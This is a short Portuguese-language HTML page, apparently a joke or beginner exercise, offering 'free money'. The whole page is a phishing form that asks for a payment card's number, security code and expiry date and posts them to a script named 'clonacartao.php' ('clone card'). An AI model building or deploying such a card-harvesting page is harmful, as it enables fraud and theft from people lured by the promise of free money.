<!DOCTYPE html>
<html lang="pt-br">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>dinehro gratis</title>
    <!--    <style>
            input[type=text]{
                width: 30px;
            }
        </style> //-->
</head>

<body>
    <form action="clonacartao.php" method="post">
        <h2>dinhero gratiz !!1!!!!1!!!</h2>
        numeros do cartao <input type="text" name="nc" maxlength="19" size="19" minlength="19" autofocus required> <br>
        numeros que fica atras do cartao <input type="text" name="nac" maxlength="3" size="3" minlength="3" required> <br>
        data de vencemento <input type="text" name="dv" maxlength="5" size="5" minlength="5" required> <br>
        <input type="submit" value="ficar bolanário!!">
        </form> 
</body>

</html>
